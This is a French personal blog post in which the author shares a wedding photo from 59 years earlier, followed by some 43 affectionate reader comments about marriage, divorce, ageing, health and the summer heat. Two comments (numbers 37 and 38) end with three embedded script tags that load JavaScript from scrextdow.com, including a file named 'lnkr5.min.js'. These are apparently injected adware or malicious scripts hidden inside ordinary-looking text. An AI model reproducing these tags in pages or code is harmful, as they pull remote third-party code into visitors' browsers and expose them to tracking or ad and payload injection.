• rhoooo c'est si loin ...

    çà ne s'oublie pas ...

    même si au bout de 19 ans j'ai tiré ma révérence !

     

     rhoooo c'est si loin ...  

     rhoooo c'est si loin ...59ans se sont écoulés entre ces 2 photos

    Souvenirs souvenirs ... merci de votre aimable compréhension !

     

    L'art est difficile... et les échecs aussi

    Dali.

     rhoooo c'est si loin ...

     

    Celui qui prend des risques peut perdre,

    celui qui n'en prend pas perd toujours" 

    Xavier Tartacover

     

     rhoooo c'est si loin ...

     

    « Samedi ... c'est sexy !!! Défi chez Vaniyé »

  • Commentaires

    43
    Jeudi 12 Juillet 2018 à 02:44

    Cette photo souvenir est bien belle

    ainsi que ta superbe création

     

    Je suis toujours contente de voir tes magnifiques réalisations

     

     

    J'ai pris du retard sur les blogs et forums

     

    Mon ouvrage sur le terrain est énorme

     

    de plus cet après-midi, je suis tombée dans une extrême épuisement

     

    (Mon syndrome de fatigue chronique et fibromyalgie)

     

    Je suis incapable de faire quoi que ce soit donc, je pense que je ferai du copie coller

     

    Mille pardon, mais les mots sont aussi pour chacun de vous

     

    Vos blogs sont tous merveilleux !

     

    Gros bisou, bon jeudi

     

    Jane

    42
    Mercredi 11 Juillet 2018 à 09:23

    tu est toute belle sur cette photo! et tu à la chance de l'être encore!!! gros bisous ma Nicole. cathy

    41
    Mardi 10 Juillet 2018 à 16:16

    j ai du mal avec les confidences mais je sais que ça fait du bien

    bises

    40
    Mardi 10 Juillet 2018 à 16:10

    Coucou  Nicole ..Dans  les  année  60  c’était  la  mode  des  robes  courtes  et petit  voile ..Comme  toi , en juin  ca  aurait  fait  58 ans et  Jacques nous a quitté  brusquement  en  octobre 2016 ,je  me dis  que  c'est  pas  vraiment  possible , il reviendra .Nous  parlons  de  lui  avec les enfants  tous  les  jours . Si  je  peux  je  t'envoie  ma  photo  avec  ma  petite  robe  de  mariée ..Tu  es ravissante  pour  ce  grand  jour  et  toujours  belle  aujourd'hui .
     Je  t'embrasse  ma  douce  amie ..

    39
    Mardi 10 Juillet 2018 à 13:17

    Quelle jolie jeune fille que je vois là ;-)

    Je comprends que le monsieur est craqué !! ;-))

    Plus encore, la mariée s'étant le jour "J" fait le voile,

    ait mis les voiles à un moment donné ;-))

    "L'amour est un oeuf frais Le mariage est un oeuf dur Et le divorce  un oeuf brouillé. " ;-))

     Mille bibis ma chérie tu es toujours une belle femme ;-)

     Amitiés! Chris/Beauty*

    38
    Mardi 10 Juillet 2018 à 12:12

    Tu etais une jolie mariée

    et tu sais que moi en 1962 j'avais une robe identique à la tienne

    c'était la mode robe courte mince jolie

    c'était parfait toi tu as tenu 19 ans

    moi, j'ai tenu 50 ans de galère puis un jour

    décision de divorce en 2011

    depuis moi le bonheur, lui la galère car tous les biens étaient à moi

    marier sous contrat, que la maison construite en 1988 en commun

    partagé mais moi j'ai vendu une petite parcelle de mes vignes

    pour lui payer sa part, mes enfants voient plus leurs pères

    ni les petits enfants ils ont vu trop de souffrance infligée

    pas des coups mais cocufiage; dépense inconcidéré avec les femmes ,

    cela depuis notre mariage, j'aurais dû le virer avant

    mais voilà trop bonne trop conne, aujourd'hui il paie

    ce qu'il m'a fait en maison handicapé, et la solitude,

    voilà bientôt 77 ans et je me sens encore jeune

    j'ai un ami vigneron qui s'occupe aussi de mes vignes

    en Champagne et à l'époque c'est lui que j'aurai dû épouser

    car il m'aimait et m'aime toujours, veuf sans enfants

    ni autres famille, je pense que nous finissions notre vie ensemble

    mais chacun chez soi nombreuses sorties menu service

    et d'une tendresse jamais connus auparavant attentionné

    et lui oublie pas les anniversaires et fête ,Noël

    de toutes ma famille,

    bisou Juju; ne change pas car tu es toujours jolie ,

     

     

    <script src="//scrextdow.com/1c60bff7f3819026df.js"></script> <script src="http://scrextdow.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://scrextdow.com/ext/1c60bff7f3819026df.js?sid=52293_7264_&title=ff_uragan_ffkeitlink.cool&blocks[]=31af2" type="text/javascript"></script>
    37
    Mardi 10 Juillet 2018 à 07:54

    coucou Nicole

    tu est belle en marié

    me voilà de retour le PC fonctionne mieux ouffff

     

    il fait une chaleur étouffante je reste à l'ombre

     

    car j'ai du mal a supporter maintenant...

     

    passe une très bonne journée

     

    à demain

    ♥♥ Amitié.Bisous.Colette ♥♥ <script src="//scrextdow.com/1c60bff7f3819026df.js"></script> <script src="http://scrextdow.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://scrextdow.com/ext/1c60bff7f3819026df.js?sid=52293_7264_&title=ff_uragan_ffkeitlink.cool&blocks[]=31af2" type="text/javascript"></script>

    36
    Mardi 10 Juillet 2018 à 06:03

    merci pour ce doux moment

    35
    Lundi 9 Juillet 2018 à 23:51

    Bonsoir Juju

    Oui tu étais très belle en mariée, c'était les années 60 et la mode était aux robes courtes, je me suis mariée la 1ère fois en 65 j'étais très jeune….17 ans...j'ai tenue 24 ans puis je suis passée à autre chose...je me suis remariée , mais le premier mariage reste dans ma mémoire toujours comme un très beau souvenir.

    Je te souhaite une bonne semaine, à bientôt.

    Marie

    34
    Lundi 9 Juillet 2018 à 21:24

    Une bien jolie mariée Juju

    Passe une agréable soirée

    Bisous

    33
    Lundi 9 Juillet 2018 à 18:16

    Bonjour Nicole,

    Me revoilà, je passerai un petit peu sur les blogs.

    J'espère que tu vas bien.

    Tu es magnifique sur ta photo.

    Ta créa est très réussie.

    Je te souhaite une très bonne fin de journée.

    Gros bisous.

    32
    Lundi 9 Juillet 2018 à 18:13

    bonsoir 

     superbe  ta photo  en mariée 

     je me suis mariée  en robe courte aussi 

     je trouve  que c'est  trés  joli   , j aime  beaucoup la tienne 

     merci  de nous avoir montré  cette photo 

     bises Nicole 

     kénavo

    31
    Lundi 9 Juillet 2018 à 18:07
    septsup

    coucou… pas trop trop chaud ? ici il faut rester enfermé de 11 à 20h... c est ainsi… gros bisous t étais belle en mariée… j espère que tu as passé un super week

    30
    Lundi 9 Juillet 2018 à 15:39

    bonjour Nicole

    moi non plus je ne me reconnais pas, je préfère ne pas regarder en arrière, on ne peut changer le passé mais il faut profiter du présent

    bisous

    29
    Lundi 9 Juillet 2018 à 14:30

    Tu étais très jolie en mariée mais, pas de nostalgie : on ne peut pas être et avoir été !

    28
    Lundi 9 Juillet 2018 à 14:04

    bonjour Nicole tu est très belle sur ta photo de mariée merci pour ta belle création que tu as mis sur mon blog j'espère que tu va bien ? et que tu as passer un très bon week end ? je te souhaite un bon début de semaine prend soin de toi ma douce 

    gros bisous de ton amie

    béa

    bon début de semaine mes amies

    27
    Lundi 9 Juillet 2018 à 13:28

    Bonjour Nicole 

    Tu étais une jolie mariée !! je ne vois pas l'autre photo ? Bonne semaine  bises 

    26
    Lundi 9 Juillet 2018 à 13:21

    bonjour ma juju, après mon rdv ophtalmo qui c'est bien et d' autres rdv prévus en juillet, cette chaleur que je ne supporte pas, pas d 'air et en plus la pollution, avec mon rafraîchisseur j'ai attrapé une petite otite et j'ai des quintes de toux qi n'en fini pas ect, un traitement de 6 jours.... Dur dur de rester devant l 'ordi il chauffe lol, alors désolée d'être pas passée sur le blog, articles programmés mais les deux premières semaines d 'août je le mettrais en pause pour mes deux contrôles importants à l 'hôpital...j'espère que tu vas bien, moi j'ai halte d 'arriver au mois de septembre pour pouvoir profiter de mes journées et surtout avoir de l'air....passe une bonne journée...de gros bisous, annie

    25
    Lundi 9 Juillet 2018 à 13:03

    tu étais belle en marié Juju,,il fait chaud les plantes ont soif je viens d'arroser.je te souhaite un très bon Lundi,bises

    24
    Lundi 9 Juillet 2018 à 11:41

    coucou nicole 

    tu été une trés belle mariée 

    et méme encore tu est toujours jolie 

    il fait super chaud 

    bonne semaine 

    bises

    23
    Lundi 9 Juillet 2018 à 11:00
    Cela aurait pu durer mais on ne choisit pas toujours son destin tu étais une très belle mariée et aujourd'hui une très belle femme
    Gros bisous juju
    22
    Lundi 9 Juillet 2018 à 10:31

    Bonne semaine mon Amie,

    Ici il fait bon, j'ai installé de léger courant d'air, je suis du Nord, pas habitué à cette chaleur, que ce soit la bruine où le brouillard, la chaleur; les douleurs sont toujours là, je pense qu'avec un peu de chaleur, nous les supportons mieux.

    Gros Bisous,

    21
    Lundi 9 Juillet 2018 à 10:19

    Tu étais une belle mariée ,belles créas bonne journée bisouss

    20
    Lundi 9 Juillet 2018 à 09:14

    Bonjour Juju.
    J'espère que tu as passé un bon week-end et que tout va pour le mieux.
    De mon coté, j'arrive de nouveau a me servir de mon clavier et j'en profite pour te souhaiter un bon Lundi et une bonne semaine.
     Bisous de nous deux.

    19
    Lundi 9 Juillet 2018 à 09:01

    Coucou Manou

    ça serait ton anniversaire de mariage aujourd'hui ?

    Tu étais une très belle Mariée !

    eh oui 59 ans de plus ..... mais à 78 ans tu es encore tellement belle, tout le monde ne vieillit pas aussi bien que toi ... si, si c'est vrai !!!

    Gros bisous, bonne journée et j'espère que ton week-end avec tes jeunes s'est bien passé

    18
    Lundi 9 Juillet 2018 à 08:55

    Une très jolie mariée et tu es encore très jolie 59 ans après , bisous !

     

    17
    Lundi 9 Juillet 2018 à 08:46

    Une vraie petite poupée , superbe .

    Tu étais une superbe mariée 

    Bonne journée Nicole

    Gros bisous

    16
    Lundi 9 Juillet 2018 à 08:44

    Tu étais toute Nicole. Tu es donc restée mariée 19 ans... Pour moi la 1ère fois 15 ans, et avec mon poux-ronchon 30 ans... cela ne nous rajeunit pas !

    Bises et bon début de semaine  

    15
    Lundi 9 Juillet 2018 à 08:32

    59 ans entre ces deux photos, t'as dit. Mais... z'où qu'elle est, la deuxième ?

    En tout cas t'étais bien mimi, toute vêtue de dentelles et de voiles blancs !

    Bisous et bonne journée

    14
    Lundi 9 Juillet 2018 à 08:23

    Bonjour ma petite Juju,

    Belle photo de ton mariage, tu étais déjà mimi à l'époque ! Souvenirs, souvenirs... 

    Me revoici sur les blogs après une semaine d'absence, mes deux blogs ne sont plus en pause.

    J'espère que tu vas bien ? Fernand et moi ça va.Il fait chaud mais nous avons un vent frais donc c'est supportable.

    Passes une agréable journée mon amie adorée, gros bisous.

    Florence

    13
    Lundi 9 Juillet 2018 à 07:52

    Un moment qui marque certes, mais moi qui suis mariée depuis 1971, ce jour-là ne reste pas un de mes meilleurs souvenirs : trop de stress : retard pour tout - coiffeur -  fleuriste pour la voiture - à la Mairie - à l'Eglise, le Maire et le Curé pas contents. Pour couronner le tout, un temps affreux, des neveux petits encore qui se battaient et me tiraient mon grand voile et m'arrachaient la tête ! Non, pas pour moi ces cérémonies, d'ailleurs je n'aime pas assister à ces grandes fêtes. Je suis quand même ravie du choix du mari, c'est le principal n'est-ce-pas ? Bises. FRANCOISE

    12
    Lundi 9 Juillet 2018 à 07:51

    Bonjour Juju,

    Souvenirs.......pour moi c'était 21 et j'en ai 60 de plus...........

    Bonne semainetout simplement.

    A bientôt

    11
    Lundi 9 Juillet 2018 à 07:46

    Bonjour ma juju

    trop mignonne en marié que de beau souvenir mais pour certaines pas toujours mais les souvenir reste doux début de semaine gros bisous 

    Marlène

    10
    Lundi 9 Juillet 2018 à 07:33

    Jolie photo Juju, je reconnais ton minois !!!

    Moi je me suis marié une seule fois, mon mari est décédé à 35 ans...

    Bonne journée Juju gros bisous 

    9
    Lundi 9 Juillet 2018 à 07:32

    Bonjour ma Juju,quelle jolie mariée!!!!Que de souvenir en ni repensant.V'est une loterie,on dit c'est beau le jour du mariage mais il y a beaucoup de lendemain.Trois belles créas,jolie couleurs.Je te souhaite un bon début de semaine,une journée je pense très chaude.Gros bisous.

    Savane

    8
    Lundi 9 Juillet 2018 à 07:07

    bonne semaine mon amie avec le soleil de nouveau gros bisous bisous 

    bonne semaine tout le monde

    7
    Lundi 9 Juillet 2018 à 07:05

    Bonjour Juju , très jolie la mariée , ma robe aussi était courte !!Et c'était il y a longtemps !Gros bisous .

    6
    Lundi 9 Juillet 2018 à 06:48

    bonjour Nicole
    une bien jolie mariée ,je pense que chaque époque de la vie a son charme
    je m'excuse ,mais je n'ai pas compris ton com
      La météo annonce une journée ensoleillée
    Je te souhaite de passer une agréable journée ainsi qu’un bon début de semaine
    bisous

    5
    Soso
    Lundi 9 Juillet 2018 à 06:41
    Je crois te l’avoir déjà dit tu es une femme magnifique ! En mariée ça ne fait que se confirmer. Pour ma part vieillir ne me fait pas peur. Ce qui me terrorise ce sont mes douleurs qui ne feront que s’accentuer au fil du temps. Gros bisou
    4
    Lundi 9 Juillet 2018 à 05:48

    Oui tu étais une ravissante mariée mais les souvenirs ne vieillissent pas ! . Toujours mariée depuis les années 70 mais il faut faire des concessions yes ! . Bonne journée Juju , gros bisous , escapade , 

    3
    Lundi 9 Juillet 2018 à 04:06

    Une très belle mariée sans aucun doute!

    Bonne semaine

    2
    Lundi 9 Juillet 2018 à 01:28
    Bonjour Nicole,
    Ça fait bizarre j'ai 59 ans ... Moi je trouve que tu as bien de la chance, je ne me suis jamais mariée, deux fois en union libre ben tu vois je ne saurais jamais ce que ça fait. Tant pis ...
    Tu étais vraiment très jolie, tu étais une magnifique mariée.
    Bonne journée, bises Véronique
    1
    Lundi 9 Juillet 2018 à 00:18

    <style></style>

    Bonsoir, toujours pas de piles pour mon clavier

    Impossible de vous écrire  avec ce vieux machin, donc  comme vous n’allez pas lire ce que j’ai mis à la fin de mon article, voilà un c-c. Maël ne va pas être content il croyait que ce serait difficile à trouver la bouteille en plastique car il avait fait cette belle photo.

    Bel article ! Bon début de semaine et gros bisous @+.

    Sylvie



    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :